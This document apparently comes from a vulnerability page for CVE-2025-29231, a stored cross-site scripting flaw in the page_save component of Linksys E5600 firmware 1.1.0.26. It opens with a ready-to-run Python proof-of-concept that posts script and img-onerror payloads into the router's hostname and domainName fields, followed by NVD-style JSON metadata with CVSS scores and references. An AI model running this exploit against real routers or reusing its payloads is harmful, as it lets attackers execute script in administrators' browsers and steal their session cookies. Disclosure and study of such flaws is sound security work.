CVE-2025-29231

import requests import sys # CVE-2025-29231 PoC - Linksys E5600 Stored XSS # Target: Linksys E5600 V1.1.0.26 # Component: page_save (hostname/domainName parameters) target_ip = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.1" target_url = f"http://{target_ip}/page_save" # Malicious payload - Stored XSS via hostname parameter xss_payload = "<script>alert(document.cookie)</script>" def exploit_stored_xss(): """ Exploit the stored XSS vulnerability in Linksys E5600 by injecting malicious JavaScript into hostname/domainName parameters """ headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0" } # Payload for hostname parameter data = { "hostname": xss_payload, "domainName": "<img src=x onerror=alert('XSS')>", "submit_button": "index", "change_action": "apply" } try: print(f"[*] Targeting: {target_url}") print(f"[*] Injecting XSS payload into hostname parameter...") response = requests.post(target_url, data=data, headers=headers, timeout=10) if response.status_code == 200: print("[+] Payload sent successfully!") print("[+] XSS payload stored in router configuration") print("[+] Payload will execute when admin accesses affected page") else: print(f"[-] Request failed with status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") if __name__ == "__main__": exploit_stored_xss()

{"cve": {"id": "CVE-2025-29231", "sourceIdentifier": "[email protected]", "published": "2025-12-16T17:16:07.180", "lastModified": "2025-12-31T00:30:16.810", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stored cross-site scripting (XSS) vulnerability in the page_save component of Linksys E5600 V1.1.0.26 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the hostname and domainName parameters."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linksys:e5600_firmware:1.1.0.26:*:*:*:*:*:*:*", "matchCriteriaId": "6E8CA102-9DA8-4F5A-A80F-2E6EBE4D64B8"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:linksys:e5600:-:*:*:*:*:*:*:*", "matchCriteriaId": "CA6D6638-5946-4B18-B071-32E262754420"}]}]}], "references": [{"url": "https://github.com/JZP018/Vuln/blob/main/linsys/E5600/XSS_wan_name/XSS_wan_name.md", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://github.com/Suryaandave/CVES/tree/main/CVE-2025-29231", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}